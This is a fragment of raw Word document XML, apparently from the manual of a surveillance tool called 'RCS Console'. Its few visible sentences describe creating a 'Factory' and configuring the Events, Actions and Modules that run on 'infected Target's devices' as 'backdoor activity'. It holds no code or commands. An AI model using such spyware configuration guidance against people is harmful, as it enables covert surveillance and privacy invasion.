    </w:tbl>
    <w:p w:rsidR="0059452D" w:rsidRDefault="0059452D" w:rsidP="0059452D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="0059452D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A32EA" w:rsidRDefault="006A32EA" w:rsidP="006A32EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the new Factory is created you can access the Basic mode configuration page (double-click) and then switch to the Advanced mode, </w:t>
      </w:r>
      <w:r w:rsidRPr="00820542">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which allows to operate with a higher level of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A32EA" w:rsidRDefault="006A32EA" w:rsidP="006A32EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4673"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="4671"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B62FAE" w:rsidTr="00057420">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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4"/>
              <w:gridCol w:w="3134"/>
            </w:tblGrid>
            <w:tr w:rsidR="00B62FAE" w:rsidTr="002B0DDE">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="00B62FAE" w:rsidRDefault="003A4380" w:rsidP="00B62FAE">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                      <v:shape id="_x0000_s1067" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:79.25pt;margin-top:3.8pt;width:46.25pt;height:36.85pt;z-index:251699200;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                        <v:imagedata r:id="rId68" o:title=""/>
                        <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                      </v:shape>
                      <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1067" DrawAspect="Content" ObjectID="_1446455349" r:id="rId69"/>
                    </w:object>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="00B62FAE" w:rsidRDefault="00C467C8" w:rsidP="00B62FAE">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABA49BC" wp14:editId="67AB7CAC">
                        <wp:extent cx="719122" cy="468000"/>
                        <wp:effectExtent l="0" t="0" r="508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19122" cy="468000"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3134" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w:rsidR="00B62FAE" w:rsidRDefault="003A4380" w:rsidP="00B62FAE">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="it-IT"/>
                    </w:rPr>
                    <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                      <v:shape id="_x0000_s1068" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:5.55pt;margin-top:5.6pt;width:65.9pt;height:36.85pt;z-index:251700224;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                        <v:imagedata r:id="rId71" o:title=""/>
                        <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                      </v:shape>
                      <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1068" DrawAspect="Content" ObjectID="_1446455350" r:id="rId72"/>
                    </w:object>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00B62FAE" w:rsidRDefault="00B62FAE" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62FAE" w:rsidTr="00057420">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B62FAE" w:rsidRDefault="00B62FAE" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B62FAE" w:rsidRDefault="00B62FAE" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B62FAE" w:rsidRDefault="00B62FAE" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62FAE" w:rsidTr="00057420">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="005F657A" w:rsidRDefault="00B62FAE" w:rsidP="00B62FAE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38DAC859" wp14:editId="3C44CD75">
                  <wp:simplePos x="1304925" y="7772400"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:align>top</wp:align>
                  </wp:positionV>
                  <wp:extent cx="1919933" cy="1152000"/>
                  <wp:effectExtent l="0" t="0" r="4445"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19933" cy="11520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top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="005F657A" w:rsidRDefault="005F657A" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="005F657A" w:rsidRDefault="00B62FAE" w:rsidP="00B62FAE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="368AD427" wp14:editId="06F99D0F">
                  <wp:simplePos x="4448175" y="7772400"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:align>top</wp:align>
                  </wp:positionV>
                  <wp:extent cx="1919935" cy="1152000"/>
                  <wp:effectExtent l="0" t="0" r="444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19935" cy="1152000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="margin">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="margin">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00057420" w:rsidTr="00057420">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00057420" w:rsidRPr="00057420" w:rsidRDefault="00057420" w:rsidP="00B62FAE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00057420" w:rsidRDefault="0010013A" w:rsidP="00057420">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00057420">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidR="00057420" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00057420">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00057420" w:rsidRDefault="00057420" w:rsidP="00057420">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00057420" w:rsidRDefault="00057420" w:rsidP="006A32EA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00057420" w:rsidRPr="00057420" w:rsidRDefault="00057420" w:rsidP="00B62FAE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00057420" w:rsidRDefault="0010013A" w:rsidP="00057420">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00057420">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidR="00057420" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00057420">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00057420" w:rsidRDefault="00057420" w:rsidP="00057420">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DB2F18" w:rsidRDefault="00DB2F18" w:rsidP="006A32EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A32EA" w:rsidRDefault="00DB2F18" w:rsidP="00DB2F18">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00B24482" w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Each RCS </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00B24482" w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">actory configuration is based on </w:t>
      </w:r>
      <w:r w:rsidR="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B24482" w:rsidRPr="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of elements:</w:t>
      </w:r>
      <w:r w:rsidR="00B24482">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Events, Actions and Modules.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266"/>
        <w:gridCol w:w="8210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE1313" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="870" w:dyaOrig="825">
                <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:42.75pt;height:40.5pt" o:ole="">
                  <v:imagedata r:id="rId75" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1033" DrawAspect="Content" ObjectID="_1446455248" r:id="rId76"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00EE28E5" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">An </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent is a </w:t>
            </w:r>
            <w:r w:rsidR="00DC6876">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">specific check that may be performed on the infected </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00DC6876">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget’s devices.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00DC6876" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To make an Event useful, it must invoke an Action, as soon as it occurred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="005701FD" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="002B2AEF" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1313" w:rsidTr="00DB2F18">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="930" w:dyaOrig="780">
                <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:47.25pt;height:39pt" o:ole="">
                  <v:imagedata r:id="rId77" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1034" DrawAspect="Content" ObjectID="_1446455249" r:id="rId78"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8210" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00CE1313" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRDefault="00DC6876" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">An Action is a backdoor activity that may be performed on the infected </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE1313" w:rsidRPr="00671455" w:rsidRDefault="00DC6876" w:rsidP="008D6039">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
